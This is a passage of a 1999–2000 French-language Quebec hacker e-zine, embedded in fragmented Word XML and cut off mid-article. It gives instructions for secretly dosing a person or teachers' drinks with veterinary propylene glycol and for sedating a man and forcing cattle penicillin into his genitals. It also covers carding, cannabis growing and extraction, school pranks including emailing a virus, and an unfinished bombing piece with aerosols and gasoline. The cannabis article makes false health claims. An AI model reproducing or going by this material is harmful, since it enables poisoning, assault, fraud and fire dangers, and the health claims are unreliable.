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             __                 __         __________</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        |HH|              |HH|     /AAAAAA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 |QQ|      |HH|              |HH|     |AA|¯¯¯¯¯¯|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      |HH|______|HH|     |AA|______|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_|QQ|      |HHHHHHHHH|     |AAAAAAA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QQ|      |HHHHHHHHH|     |AAAAAAA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__   |QQQQ|       |HH|¯¯¯¯¯¯|HH|     |AA|¯¯¯¯¯¯ |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Q\     |HH|              |HH|     |AA\             /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QQ|  |HH|              |HH|     |AAA|       |AAA|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>¯¯¯     ¯¯                 ¯¯       ¯¯¯¯          ¯¯¯¯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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v o u s    p  r  e  s  e  n  t  e :</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H    HHdQHAQHAQHAQHAQHAQHAQHAQHAQHAQHAQHAQHAQHA    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H  QHAH                                      QHA H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H  QHA  QHAH          Quebec Hacker's Alliance          QHAH  QHA  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H  QHA  QHAHH                                                  QHAHH  QHA  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HH                           E-Zines #12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H                GLOIRE AU QUEBEC HACKER'S ALLIANCE                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QHA             Crée le: 2 Janvier 1999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QHA             Crée par: Dukest4r et Noobmanson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Bienvenu a notre E-Zine #12, je vous souhaite une bonne lecture et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comme je vous ait promis, je vais faire de mon possible pour collecter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seulement les meilleurs articles et laisser de coté les article inutileHH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">HH   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce E-zine est un e-zine 90% Anarchique... il n'a que des articles sur  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>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HH   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>l'anarchy!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                            HH </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Nous ne somme aucunement responsable des actes que vous ferez a la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suite de la lecture de ce e-zine. Ce text n'est qu'a titr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informationnel et nous ne devez en aucun cas l'utilisé comm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référence de crime informatique ou autres.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HH                           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>TABLE DES MATIERES:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserv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1- Introduction et avertissement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HH    2- Anarchy: Le Cannabis                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserv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3- Anarchy: Ceux qui niase nos blondes (violent)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4- Anarchy: Trucs pour ecoliers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5- Anarchy: Weed Magiqu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6- Anarchy: Gloire au QHA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7- Anarchy: House Bomberz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8- Norton Antivirus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9- Comment hacker un micro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10- Conclusion de ce merveilleux e-zine, heheh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H QHA           QHA-=[QUEBEC HACKER'S ALLIANCE]=-QHA         QHA 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H HH                http://www.qharulez.com                 HH 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HH    QHA                   dukest4r@hehe.com                 QHA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HH     QHA                                                    QHA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H                                                   QHAH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H                                                       QHAH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QHA         QHA                      QHA         Hd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HH      QHA                      QHA      QHAHH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HH   QHAH         HH         QHAH   Hg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QHA  QHAQHAQHAQHAQHAQHAQHAQHA  QHA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HHH        QHA                          QHA      HH  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H  QHAH                          QHAH  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QHA                               QHAQHA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="10082" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>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082" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>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800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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2.2 Le Cannabis  |</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obmanson QHA le 7 janvier 2000</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ai fai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eaucoup de recherche sur le cannabis : une plante aux multiples qualites ta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afouee par la societe. Contrairement aux drogues legales comme l'alcool e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 cigarette, qui causent plusieurs millers de morts par an (150 000 mort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ur l'alcool, sans compter les accident de la route) et 300 000 pour l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igarette). Le cannabis n'est pas une drogue letale ce qui veut dire qu'i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st IMPOSSIBLE de faire une overdose de cannabis. Meme la cafeine, le suc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t la nicotine peuvent causer la mort lors d'une surdose. Eh oui, en plus d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2000 ans d'usage, le cannabis n'a cause que 0 mort eh oui, zero. Mais avez</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us reflechi a l'empleur du probleme :) Hahaha.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c, un petit historique pour votre culture personnelle. Ca va comme sui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est dans les annees 30 aux Etats-Unis (merde chaque fois qu'on parle d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erde ils sont la eux hein), l'alcool etait interdit et tres facile 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fabriquer et revendr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st jusqu'a ce temps qu'un milieux underground de consommation s'est cre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ar l'arrivee des sud-americains et africains car, a ce moment la, l'existenc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u cannabis etait inconnue des blancs. On voyait dans les journaux, l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utobus, dehors, de grosses publicites payees par le gouvernement en faveu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 la legalisation de l'alcool. On y voyait "la marijuana : une drogue qui</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tue". Il disait que si tu en fumais, tes yeux devenaient rouge et que t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tais pret a tuer n'importe qui :( C'est la que la terrible tortu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sychologique de cette plante qui ne demandait qu'a aider a commenc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aurais aime que vous voyez ces publicites tant cruelles que denudees d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ens et de rationnalite. Mais, malheureusement je n'ai pas de scann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c, les gouvernements au pouvoir ont fait des etudes pour savoir si cet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lante etait vraiment nuisible... Le Canada, apres une etudes de plus de 1000</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ages, en a conclu qu'il suivrait les Etats-unis :( J'en pleure encor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s Etats-Unis, ils ons fait des tests sur des animaux et autre... comm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tamment ils ont extrait le THC de la plante et l'on injecte dans des sing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s doses qui equivalaient a si un homme d'age et de poids moyen fumait ent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00 a 200 grammes par jour... Les singes sont devenu fous et ils ont interdi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e cannabis... Seule la Hollande a su peser le pour et le contre pour e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rriver a une decision exemplair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vrai dire, nous ne pouvons pas blamer le gouvernement etats-unien. Il etai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eulement corrompu. En fait, ce sont les compagnies privees qui ont decid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tamment l'industrie pharmaceutique qui venait de decouvrir les produit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himiques qui coutaient cher et qu'ils vendaient cher. Une legalisation d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annabis aurait ete fatale pour la pharmacologie contenu du fait que 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annabis guerrit plus de 50% des maladies, symptomes et autres viru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suite, il y a eu l'industrie du coton, qui n'aurais pas pu nous vend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eurs super paires de jeans tous les mois (parce qu'il brise) quand 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hanvre aurait pu nous en vendre moins cher et pour plus longtemps. Car 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oublions pas que le cannabis produit une fibre textile (le chanvre) d'un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qualite et d'un solidite incomparable : Des industries comme ca, il y en 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et il y en a, on pourrait en nommer pendant des jours et des jour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 cannabis est tellement diversifier :) Les Francais ont reussi a partir d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annabis a produire des materiaux de construction et d'isolation jamai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gales par quelqu'autre substance que ce soit. Nous sommes maintenant capabl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 produire du carburant pour voiture a partir du cannabis, du savon, d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aume pour les levres, de la corde, des vetements, ... et j'en pass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onc ses peut etre con car je choke pas moi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es a seus qui en fume je vous di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of!....arreter pa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obmanso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2.3 CEUX QUI NIASE NOS BLONDES  |</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truc pour faire chier un ancien chum de gar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qui vous a picker ou plutot niaisser votre blond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que vous aimer suremen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ya plusieurz truc a vrai di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ici mon firt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il vous fais chier !faite le donc bouffer en quantiter industriel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ans se cas  !!! lololo</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ici de se quest composer mon stock:</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667 ml. de propylene glyco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20.00 mg. de chlorure de chlo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1.76 mg. iodure de potassieum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u diiodohydra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0.44 mg. de d'éthylene diamin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00 mg de sulfate de cobat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es simpl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es préparation: vous finder(trouver pour les neuneuz ou tou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onnement appeler lamerz) un vétérinaire pour GROS animaux</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genre vache mouton chevre....po de hamster et de gerbill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ou de chat !... de big animal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us demander au vétérinaire du "glycol-p" solution pour bovin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itier (des vache en francais) ou pour les moutons, de tou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aco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es la meme  chose!! vous avez donc le produit"glycol-p" en vot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possesion mes attention fautz payer......donc ayer recou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u carding :) pour votre blé!! ses asser chere donc pren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us un bon 100$ sur le compte de votre malheureuse victim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 cardingz..... et vous payer sa casch au vétérianai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ction: vous inviter votre victime qui vous fais chi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mine de rien vous lui offrez du jus de fruit mes ses juste l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glycol-p que vous avez mélanger avec pour donner du gou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il avale par voie oralez le produit...donc par la bouch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attention! : se produit est dangereux pour un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ache sa prend juste  375 mililitre (ml.) fac aller si mollo fau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 le tuer !!! donc 50 ml ses en masse !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nsuite le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résultat : il va (si vous lavez po tuer !!lololol) une imense faim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il va manger tout  se qui trouve comme bouff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ur son passage ...donc qu'est-ce-qui arive lorsque o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age trop....des gros bobo a son ventre....honnnnnnn ser t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triste !!! donc sa va le faire CHIER tout comme il vous as fai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chier.....et se mélange se fait pour TOUT le monde quand j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dit sa je pense au ens"a"ignant de votre chere école ...se stock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s la "buvette" des profz.....hahahahahh</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entk ceci est le truc #1 pour faire chier....et je tien aussi a vou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avertir que je suis nulement responsable des domag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fait par votre mélange . vous seul est responsable car je retir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toute responsabiliter a moi noobmanson et a toute la crew du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QHA car nous actionner ...savez vous comment sa coute u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vocat  de merde a l'heure....paz loin du 200$$$$$ fac a vou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 décid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truc # 2</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ncore cher monsieur le vétérinai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a sais plus dégueulasse et plus méchant....car....votre ex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hum de gars a violer votre blonde et la "zigner" apr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voir droguer......faite pas sa a ma blonde car vous etez</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mort !!! MORT ok ser tu clair M-O-R-T rien de + simpl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et je suis sur que ses de meme pour tout personn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qui aime sa blonde (nommons Duke4tser qui a une blond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insi que .*virus*. qui lui aussi a une blonde! a vos risque d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aver nos girlfriend!!! je me sens méchant en disant s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onc ya violer votre chere blonde ...que fair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faire mine de rien et lui donner de la pénicéline dans sa ptit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zéset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rocédu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aller cher le docteur big animauz et lui demander un pack d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péniciline pour vache faisant de la MAMITTE  et demand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 la "PIRSUE ou de la PÉNICÉLINE 17900"  les 2 so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aussi fort!! et acheter aussi des calement a cheval!! avec de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gantz aussi.....</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action: lui donner les calement a chevalz et inquieter vous po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il vos ronfler asser vite merci :) un coup qui ronfl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us lui enlever ses pantz en vous préparant a rire de son ti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ewi !! ou savoir s'il est circonsi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t prendre une dose de pénicéline ! metre l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gant avant de "toucher" "ouach ouach  ouach"</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t de enlever le bout du tube de pénicéline (en passe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es de la drogue sa...) et lui fourrer sa ds le boute du glan  e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incerer le stock ! sa va faire mal en criss quand qui va s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réveill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il risque d'etre plus capable de se mastuber meme...je vou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jure que sa va faire mal ! ...pk sa fais mal ? ses simpl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ette drogue a vache serz a détruire tout l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etit cayos ds le lait..donc ses un pulvérisateur....ouch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e rappelle que ceci est a titre dinformation (qui sont vrai mes po</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ester par moi (ouach)) et que vous seul avez le chois d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isseill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truc #3 si votre cheeeeeeeeeeeeer chum de gars a une vilain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grippe pi qui veut se soigner offrer lui ceci:</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u "pen-aquerou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a se prend cher doc animauz pi sa coute un 20 aine de piass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ici les ingrédient actif:</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rocaine de pénicéline G ........................300.000 iu/m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es agent de conservation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éthylparaben.....................................................0.12% w/v</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ropylparaben......................................................0.014% w/v</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ur vous donner une idée de la force de se produi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pour les vache ou chevaux sa prend :1 ml par 45 kg de chai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ctiv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ur les chien ses 0.5 ml a 1 ml par chai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ur les cats (chats) ses 0.25ml a 0.5 ml par chai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 pis mauvaise nouvelle....sa se donne par voie intramusc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ire se produit la.......donc avec une sering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vous de jouer ! sa va faire mal mes au moj i auras pu la gripp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i dapplomd a part de sa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eci conclu donc se texte asser "osser" je ne suis po responsab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 ce que vs faites oublier po s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obmanson dis " osti de trompeur de nos blonde...ajisonz comm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s animauz..."</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___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2.4 Article un peu special, par .¤Pyro¤.  |</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Special pour les gars ki seche juste pour rentrer chez eux!!!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Alors trop simple: Vous allez en classe le matin, et la pendant les cours, vous commencez a faire le malade , style un peu affalé sur le bureau + se mettre les mains autour du ventre et se plier, faire une tronche de malade Quoi!! Au bout d'un moment on vous remarquera et generalement on le feras remarker a la prof, ki peut vous envoyer a l'infirmerie! par contre ca se complike, kand vous allez vous lever continuer a faire la sale tete et meme pire ET SURTOUT NE PAS SE MARRER EN VOYANT LES POTES KI COMPRENNENT!!!!!!! A l'infirmerie continuer d'etre malade inventer un mal de crane+ maux d'estomac!! Normalement vous rentrez chez vous et y va falloir continuer d'etre malade!! 1. Si vos parents travaille no blem!! faites la teuf juska ke vos parents rentre!! 2. Si vous avez un vieux a la maison, ca se complike!! Il va falloir continuer ect.... et meme allez voir le medecin et normalement pas de probleme il vous trouveras toujours malade! Et ca , ca peut continuer sur 1-2 jours de + Facile no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es Conneries a faire en classe :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oller sur le banc du prof, sa craie a la super gl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Foutre du vernis ou de la laque sur les craies pour qu'elles soit inutilisables.(Si le prof ecris au marqueur sur le tableau ,remplacer la mine par celle d'un indélébi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vant les vacances, oubliez quelques tartines au paté ou au filet américain ainsi q'une ou deux bananes dans votre banc(Résultat assuré a la rentré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idez une ou deux bombes de déodorant bien puant au dessus du bureau du prof avant son arrivé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ur rajouter du raffinement a la chose vous pouvez tjs lacher de bonnes grosses berlouzes bien puantes (Pour ceux désirant les lacher en toute discrétion afin d'accuser le voisin par la suite.Il suffit de larguer tout en reculant son siége en prennant soin de bien trainer les pieds sur le sol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ur que les souffrances soient équitables, manger du saucisson ,du boursin et du camenbert avant l'oral ,me semble une nécéssité.</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nduire un objet blanc (bic,stylo,latte,...) de tippex et demandez a votre voisin ,en tenant le bic par un bout sec de le rendre au mec qui se trouve au premier banc.Comme par enchantement au bout de quelques essais une bonne partie de la classe se retrouve avec les mains coloré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nvoyer une enveloppe au prefet contenant un virus portant le nom de urgent.exe peut s'avérer être une riche idé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i vous aimez les lettres vous pouvez aussi ,envoyer toutes sortes de bons de commandes (Le port est tjs payé par le destinataire)pour des encyclopédies,fiches cuisines ou encore matériel de gym.(On réussi a envoyer 3 kilos de vitamines et 3 ouvrages sur l'egypte antique a un de mes éducateu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oller des photos de jolies créatures dénudées dans vos chiottes ou en classe.En indicant "apelle moi au " et lachez le number d'un po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us pouvez aussi glisser une de ces photos dans un cahier de devoir lorsque vous les rammasés pour les rendre au prof.</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Organiser un concours "vis",c-a-d celui qui aura amassé le plus de vis provenant de bancs,chaises ou tableau gagne.(Il faut prévoir cela a l'avance pour que chaqun amène son tournevi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Coller a la super glue une piece de monaie sur le banc ,tous ceux qui utiliseront votre banc par la suite vont se péter les ongles a force d'essayer de la décoll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Toujours avec de la glue vous pouvez coller le siege de vos potes au so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mander a toute votre classe d'amener réveils,jeux electroniques,minuteries,... et faites sonner tous ces petits objets en même temps ,toutes les minutes pendant tout le cour le resultat est garanti.</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Faire la ola dé que le prof écrit au tablea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ser sans arrêt des questions trés longues qui nécessite une réponse trés longue elle aussi.Avec une dizaine de questions il y a moyen de passer un court de religion sans bosser une seule minu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Faire un strip-tease lorsque vos cops passent leur élocutio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ettre deux playmobiles dans la cour et former un cercle avec plein de personnes comme lors d'une bagare.Les educateurs se raménent et dispérssent tout le monde et on l'air bien con une fois qu'ils voient ce qu'est réellement la bagar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ouer sur la gueule des profs avec de petits lasers de poch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i le prof vous demande de donner votres avis sur l'année scolaire écoulée ,écrivez : J'ai passé une formidable année scolaire et rajoutez s'était il y a deux an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époser pleins d'effaceurs sur le dessus du tableau ,comme cela dés que le prof ecrit il se ramasse une dizaine d'effaceurs sur la gueu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onner des coups de pieds dans la chaise de votre voisin de devant lorsque le prof est tout prés de vous,et quand il se retourne dites lui bien fort "Mais retourne toi ,hein !".Il y a 99% de chance que le prof l'engeu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nduire le bord du bureau du prof de poussiere de craie des effaceur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ans le local vidéo ne jamais omettre de prendre votre montre télécommande pour zapper continuelleme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hésitez pas a enduire la planche des chiottes de colle a papier (elle est invisible),je suis sur que le premier qui ira se soulager sera ravi d'avoir le cul enduit de col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 propos de colle vous pouvez gratter le "R" du mot pritt sur le tube de colle de vos gentils cammarades de classe,et transformer le "P" en "B" avec un marqueur .Ce qui donne une nouvelle marque a la col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2.5 sa wEEd mAGiQUe  |</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obmanson le Jardinier et sa wEEd mAGiQUe .QH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Yo! C'est bientot le printemps, il est temps de sortir dans votre jardi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fin de planter la sainte semenc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us avez compris de quoi je veux parler... l'immuable, la veneree sUPERwEEd!</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lors d'abord, faut recuperer des belles graines (elles sont grises, fo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nviron 4 mm de diametre, un peu ovales avec la tete point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lles ne doivent pas etre vertes. Il faut savoir que environ 70% des grain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ussent correctement. Il faut en recuperer environ une vingtaine pou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ommencer, afin d'avoir de beaux plants par la sui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on, on est en avril. les dernieres gelees sont passees, c'est bo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On peut commenc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Prenez un bac en platique (40cm *40cm environ). Mettez du coton hydrophi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u fond (environ 5 cm d'epaisseu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Humidifiez le. Pas trop trop (faut pas que ce soit un marecage) mais quand</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eme, n'hesitez pa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2-Posez vos graines, bien reparties sur toute la surface du bac. La poin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ien en haut, vers le cie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3-Posez maintenant par dessus une *fine* couche de coton hydrophile (1mm, mem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as). Faut voir les graines a traver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4-Laissez le bac le plus au jour. N'hesitez pas a le laisser sous un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mpe, avec 1h de nuit par jour (faut quand meme garder le cycle nature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eci accelere la premiere phas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ttendez... Les graines vont s'ouvrir, puis des racines vont se developp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ans le coton. Deux petites feuilles vertes vont se developper, pui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ux autres, puis d'autres petites feuilles... C'est bon. Humidifiez toujour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Faut jamais que ca seche. Au bout de deux-trois semaines, ca doit etre bo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s plants sont suffisament gros, faut les replant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5-Le mieux est de les placer dehors, dans de la bonne ter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Tout d'abord, faut faire une serre ! C'est facile, il suffit de plier un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izaine d'arceaux d'acier, les planter dans le sol, les uns apres l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utres, parallelement, puis de poser dessus une bache en plastiq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transparent. Faire tenir la bache par terre avec des pierr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lt;----------------- arceau d'aci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lt;- so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aintenant, faut replanter les plants... Pour cela, virez les DELICATEME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u bac en plastique. Faut pas casser les racines, c'est hyper fragi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Faites hyper gaffe ! C'est le moment ou il y a le plus de risque pou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s plants ! Et replantez les sous la serre, avec des intervalles de 70 cm</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nviron (hehe, ca va grandir ! ;)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6-Faut arroser regulierement (la on doit etre au mois de Juin). Il fai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hyper chaud. L'ideal est de mettre un systeme d'arrosage automatiq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genre un tuyau perce avec des epingles, et relie a un robinet que vou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ouvrez une fois le matin pendant 10 secondes et une fois le soi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us pouvez meme y coller une electro-vanne qui s'ouvre et se ferm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utomatiquement avec une interface collee a votre PC et un p'tit programm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n C sous Linux tout co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7-La vous allez halluciner, si vous vous en occupez bien, ca va grossi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ien comme il faut. (L'ete dernier, vers Juin, mes plants prenaie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usqu'a 10cms par jour !!!). Bon, la on est en Juin, vos plant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oivent mesurer 1m et quelques si tout se passe bie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On va pouvoir differencier males/femelles. Les males sont ceux qui o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u pollen (les trucs jaunes). Ca faut y virer. Faut pas qu'ils feconde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es femelles. Y'en a qui se servent du pollent... mouai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8-Bon... vous continuez a vous en occuper, toujours bien arroser, deux</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fois par jour environ. Vous devez commencer a avoir des jolies tet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est sur le bout des branches femelles, la ou il y a plein de feuill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t la ou ca sent hyper bon). Il y a meme de la resine normaleme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s plants sont mainenant a leur apogee (mi aout), genre deux metres e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quelques si tout va bien. Les males vont mourir. Faut les couper, et vi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es fumer ! (le male c'est pas top, mais c'est pas mal quand meme ;)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9-Continuez a vous occuper des femelles, jusque en Septembre. La ca commenc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 faire froid. Les graines commencent a tomber. Recuperez le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 partir de 20 graines j'ai recupere environ 350 grammes de graines ! C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oit en faire quelques milliers !!!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oment emouvant, vous leur coupez les pieds, et vous les enfermez dans u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ndroit noir, bien ventile (pas un placard bien ferme, sinon ca pourrit e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ux jours !). Attendez que ca seche. La ca doit sentir un max la resin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b/>
        <w:tab/>
        <w:t>Yahoo !!! Vous avez des tonnes d'herb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0-Une fois sec, c'est tout bon... Vous pouvez vous rouler des bons gro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atts de weed (hehe, 24 feuilles fut le record de l'ete derni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00 % naturel ! Vous n'en trouverez pas de la meilleur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1-Si vous n'aimez pas la weed, y'a moyen de faire du mato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Il faut: 1Kg d'herb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b/>
        <w:t xml:space="preserve"> 20 g de resine de pi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b/>
        <w:t xml:space="preserve"> un fou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b/>
        <w:t xml:space="preserve"> une grande cassero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b/>
        <w:t xml:space="preserve"> un peu d'essence de therebentin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b/>
        <w:t xml:space="preserve"> un petit plat qui va au fou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b/>
        <w:t xml:space="preserve"> des ustensiles pour remu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vec 1Kg d'herbe on peut en faire environ 200 Grammes. Pour cela, prenez</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une grande casserole, mettez l'herbe dedans avec de l'alcool a 90. Faut q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lcool recouvre l'herb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Faites chauffer (pas trop, ca rique de prendre feu ;) ). Pas sur le gaz, su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une plaque chauffante, a resistance. Jusqu'a ce qu'il y ait des bons peit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ouillons. Laisser chauffer deux heur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eparez l'alcool de l'herbe. GARDEZ LE !!! C'est lui qui renferme le THC</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tetra hydro cannabinol). Remplacez le par du nouveau. Refaites bouilli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oucement. Refaites chauffer pendant deux heur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irez l'alcool, gardez le. Repetez les etapes precedentes, mais cette fois ci</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vec une temperature legerement plus for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ila, vous avez plein de litres d'alcool bourres de THC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aintenant, versez l'alcool dans une grande casserolle, et faites chauff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usqu'a obtenir que des residus pateux verts. Ajoutez un peu d'essence d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therebentine afin de diluer le tout, et de la resine de pin afin d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e solidifier (20g de resine enviro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ettez le tout dans un plat carre, passez au four 20 minutes a donf'</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a va gonfler, votre matos est pret !!! A tab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obmanso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jai décider de copier notre "QHA news" afin de vous exprim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certaine de mes penser e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e texte rentre emplement dans ce que je veux vous expliqu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iser ensuite je parlerai....</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2.6 GLOIRE AU QHA  |</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e vais vous raconter mon histoire avec les QH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ainsi vous pourez mieux comprendre notre evolutio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es QHA ont été crée le 26 juillet 1998 par moi; Dukest4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es QHA ne vont jamais s'eteindre, nous somme encré dan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histoire de la vie pour l'éternité alors habitué vous a nous voi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dans le decors parce que personne ne sera jamais en mesure d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nous arreter. Notre but premier est d'apprendre tout ce qui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existe dans le monde de l'informatique et de l'anarchy.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Nous sommes actuellement centré surtout sur la programmatio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et l'anarchy. J'aimerai remercier tout ceux qui ont contribué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jusqu'a présent pour les QHA meme si vous n'y faite plus parti,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us nous avez grandement aidé. Plusieur projets réellemen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incroyable sont en constructio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es QHA ne cesseront jamais de battir... contrairement a certai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gens nous avons une mentalité de constructeur et non d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destructeur. Je voudrais remercié certaine personne qui on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marqué l'histoire des QHA; S-Killah, notre vice-présiden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ainsi que tout les autre programmeur qui ont contribué a no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réalisation et qui travaille sur nos projets actuel, Siriu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e plus vieux membres des QHA a ce jour, l'un des dirigant de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QHA, Inrage, notre ex-vice-presiden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Noobmanson, un des meilleurs anarchiste des QHA,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Deadluck, celui qui ma présenté ma blonde, Fr0d,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un des carder les plus maniaque que j'ai jamais vu!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Et toute les autres membres des QHA qui nous ont aidé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Merci beaucoup!!!! Mais je dois surtout remerci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Deadluck pour m'avoir présenté ma blonde que j'aime et qu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aimerai toujours: Patrici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I LOVE YOU 4EV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et bien oui je suis mensionner dans se texte de Duke, oui je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uis tres happy mes je me dois de toujour faire ma job</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anarchiste afin de NOUS faire évoluer et si je di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NOUS ses que l'underground québecquoi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dois de se faire "bouster" pour que nou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retrouvions notre fierter notre honneur et se faire respect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 travers le monde entier en criant notre "cris de guer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GLOIRE AU QUEBEC HACKER'S ALLIANC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comme duke mensionne tres bien, nous somme encrer dan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histoire...et bien moi je suis tout a fais daccord avec ca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es en se montrant fort et constructif que sa peut march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je dit ceci pour l'underground, le QHA, mes aussi pour cell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que j'aime ..... Maggie ! je pourrais parler de elle pendant de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heures et des heures mes je vais tacher de cré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s page web a son  éfigie car je dois de vous montrer ses quoi</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honneur et la fierter d'etre menbre de QH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ur rien au monde je vais quitter cette GRANDIOS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rew québecquoise. On as un master super (Dukest4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de tres bon programmeur (S-Killah) qui est en passent un chris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 bon gars ! et tout les autres members aussi mes je dit tou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car les nommer un apres l'autre ses trop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ong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Oui certain vont se dire en voyant notre liste de Virii,programe e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eme la liste des Hacker's de QHA qu'on ais des super CRASCH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t que chaque réseau qui peut etre détrui va etre détrui par eux</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es hacker de QHA et bien sacher que ses peut etr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a meme chose que je me disait avant de connaitre DUKE me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orsque vous parler a se gars et que vous etes sérieux (avec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s tites dose d'humour !) et bien vous découvrer une aspec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uvelle a cette Crew ....certain vont se dire : j'suis dans le QH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va baver le monde entier ! po grave le QHA va me défend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et bein moi perso...je ne défenderais peut etre po s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gars la...car il mets notre "pouvoir" sur le mauvais cot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 la track de l'underground..nous sommes des gar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cool, sociable comme asociable mes nous restons des gar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qui veulent montrer a la scene québecqoise que : les QH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nt batir une societer nouvelle dans le monde informatiqu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québecquois ... une societer qui auras comme but de construir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peut etre que un jour la GRC va se metent de notr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coter..lolololol !.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es durant ce temps, je vous invite a venir partager vos opinion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ur ce que nous :créons,envisageons et pensont ! et si vous avez</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s versions positive de l'underground, et bien faites moé tou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savoir sa a :anarchy_qha@hotmail.com et je tacherai de publi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tout vos commentaire sur ce ptit .tx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glory a nous,glory au QHA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obmanson. anarchiste QH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2.7 House Bombers  |</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ar noobmanson QH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on pour faire sa, sa prend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tre te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du bois (des planche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s clouz et un martea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s canette aérosol contenat des matiere tres explosiv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s petits contenant avec des bouchon si vous désir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u gaz (le meme que pour un automobile..un char en québecquoi)</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une camera video avec un pilli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u doigter pi ser tou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remiere étape de larticlez/</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us construiser une cabane (maison) 